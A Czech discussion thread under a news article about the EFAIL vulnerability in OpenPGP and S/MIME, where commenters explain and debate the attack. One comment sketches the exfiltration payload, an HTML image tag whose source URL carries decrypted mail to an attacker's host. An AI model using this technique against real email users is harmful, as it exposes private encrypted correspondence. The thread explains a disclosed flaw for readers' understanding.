Vlákno názorů k článku
EFAIL kritická zranitelnost OpenPGP a S/MIME umožňuje útočníkovi rozšifrovat e-maily od peter - Doporucuji kliknout si na link. Ta zpravicka nevysvetluje...

14. 5. 2018 13:44

peter (neregistrovaný)

Doporucuji kliknout si na link. Ta zpravicka nevysvetluje presne, o co go.
Utocnik vytvori source-code noveho mailu tak, ze prida prilohu (--BOUNDARY) html obrazek s externi url. K adrese prida prilohu (--BOUNDARY) kod stareho mailu.
<img src=link/--BOUNDARY sifrovanymail">
Uzivatel mail otevre. Renderovaci program se pokusi vsechny prilohy nacist. Desifruje mail a prida k adrese obrazku. Cili, odesle desifrovany mail utocnikovi. Viz obrazek na te strance
https://efail.de/media/exfil1.png
- Skok na další nový názor. K navigaci lze použít i klávesy N pro následující a P pro předchozí nový názor
14. 5. 2018 14:09

David1234 (neregistrovaný)

Na základě toho obrázku jsem konečně pochopil. To ale není zranitelnost OpenPGP ale emailových klientů, ne?
- Skok na další nový názor. K navigaci lze použít i klávesy N pro následující a P pro předchozí nový názor
14. 5. 2018 14:12

MarSik (neregistrovaný)

Asi obojí.. klient by neměl automaticky nahrávat obrázky z externích zdrojů a PGP by nemělo dešifrovat každý náhodný blok, který náhodou jako šifra vypadá.

Dále u nás najdete